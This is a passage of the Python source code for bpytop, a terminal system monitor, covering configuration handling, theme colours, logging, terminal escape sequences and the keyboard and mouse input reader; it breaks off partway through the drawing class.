# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, localtime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print("ERROR!")
print("\n".join(errors))
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.56"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-b", "--boxes", action="store", dest="boxes", help ="Which boxes to show at start, example: -b \"cpu mem net proc\"")
args.add_argument("-v", "--version", action="store_true" ,help ="Show version info and exit")
args.add_argument("--debug", action="store_true" ,help ="Start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_BOXES: str = stdargs.boxes
DEBUG = stdargs.debug
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Manually set which boxes to show. Available values are "cpu mem net proc", separate values with whitespace.
shown_boxes="$shown_boxes"
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes update multiplier, sets how often the process list is updated as a multiplier of "update_ms".
#* Set to 2 or higher to greatly decrease bpytop cpu usage. (Only integers)
proc_update_mult=$proc_update_mult
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors have been found
show_coretemp=$show_coretemp
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus are flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",".
#* Begin line with "exclude=" to change to exclude filter, otherwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Filter out non physical disks. Set this to False to include network disks, RAM disks and similar.
only_physical=$only_physical
#* Read disks list from /etc/fstab. This also disables only_physical.
use_fstab=$use_fstab
#* Set fixed values for network graphs, default "10M" = 10 Mebibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, e.g. "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwidth usage or auto scale, bandwidth usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Starts with the Network Interface specified here.
net_iface=$net_iface
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetic
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "#00",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
SUBSCRIPT: Tuple[str, ...] = ("₀", "₁", "₂", "₃", "₄", "₅", "₆", "₇", "₈", "₉")
SUPERSCRIPT: Tuple[str, ...] = ("⁰", "¹", "²", "³", "⁴", "⁵", "⁶", "⁷", "⁸", "⁹")
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
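# Usage sketch (timings are written to the error log at DEBUG level):
#   TimeIt.start("collect")
#   ...                     # code being measured
#   TimeIt.stop("collect")  # logs 'collect completed in 0.012345 seconds'
# or decorate a function:
#   @timeit_decorator
#   def draw_all(): ...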
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "use_fstab", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "theme_background",
"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp", "proc_update_mult", "shown_boxes", "net_iface", "only_physical"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
shown_boxes: str = "cpu mem net proc"
update_ms: int = 2000
proc_update_mult: int = 2
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
check_temp: bool = True
cpu_sensor: str = "Auto"
show_coretemp: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
only_physical: bool = True
use_fstab: bool = False
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
net_iface: str = ""
show_battery: bool = True
show_init: bool = True
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
cpu_sensors: List[str] = [ "Auto" ]
if hasattr(psutil, "sensors_temperatures"):
try:
_temps = psutil.sensors_temperatures()
if _temps:
for _name, _entries in _temps.items():
for _num, _entry in enumerate(_entries, 1):
if hasattr(_entry, "current"):
cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
except:
pass
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformatted or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version mismatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
continue
if not '=' in line:
continue
key, line = line.split('=', maxsplit=1)
if not key in self.keys:
continue
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorting" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "update_ms" in new_config and int(new_config["update_ms"]) < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
new_config["cpu_sensor"] = "_error_"
self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
if "shown_boxes" in new_config and not new_config["shown_boxes"] == "":
for box in new_config["shown_boxes"].split(): #type: ignore
if not box in ["cpu", "mem", "net", "proc"]:
new_config["shown_boxes"] = "_error_"
self.warnings.append(f'Config key "shown_boxes" contains invalid box names!')
break
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
DEBUG = CONFIG.log_level == "DEBUG"
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if ARG_BOXES:
_new_boxes: List = []
for _box in ARG_BOXES.split():
if _box in ["cpu", "mem", "net", "proc"]:
_new_boxes.append(_box)
CONFIG.shown_boxes = " ".join(_new_boxes)
del _box, _new_boxes
if SYSTEM == "Linux" and not os.path.isdir("/sys/class/power_supply"):
CONFIG.show_battery = False
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and not force: return
if force: Collector.collect_interrupt = True
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < 80 or cls._h < 24):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < 80 or cls._h < 24:
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < 80 else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < 24 else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.to(cls._h // 2, cls._w // 2 - 23)}{Colors.default}{Colors.black_bg}Width and Height needs to be at least 80 x 24 !{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
Collector.proc_counter = 1
if Init.running: cls.resized = False; return
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
if out and text: out += " "
if text: out += f'{text}'
return f'\033]0;{out}\a'
class Fx:
"""Text effects
* trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace.
* uncolor(string: str) : Removes all 24-bit color codes and returns the string."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor position
t = to
r = right
l = left
u = up
d = down
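# Usage sketch: the short aliases compose into plain escape strings, e.g.
#   Draw.now(Mv.to(2, 4), "hello", Mv.r(3), "world")
# moves the cursor to line 2, column 4, prints "hello", skips three columns and
# prints "world".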
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
return bool(cls.list)
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in its own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If the first character is an escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting an IO block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go through the dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
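# Illustrative sketch only, never called anywhere: the polling pattern the Key
# reader above is built for: block in input_wait() until the reader thread
# signals a keypress, then drain the queue with get(). The loop and the "q"
# handling are hypothetical and only for demonstration.
def _example_key_polling() -> None:
    Key.start()                      # spawn the _get_key reader thread
    try:
        while True:
            if Key.input_wait(1.0):  # True on input, False after a 1 second timeout
                while Key.has_key():
                    if Key.get() == "q":
                        return
    finally:
        Key.stop()                   # set the stop flag and join the thread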
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
    * - Adding "!" suffix to name sets now to True and prints name's current string
    * .out(clear=False) : Print all strings in buffer, clear=True clears all buffers after
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
    * .saved_buffer() : Returns a string of all the saved buffers
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
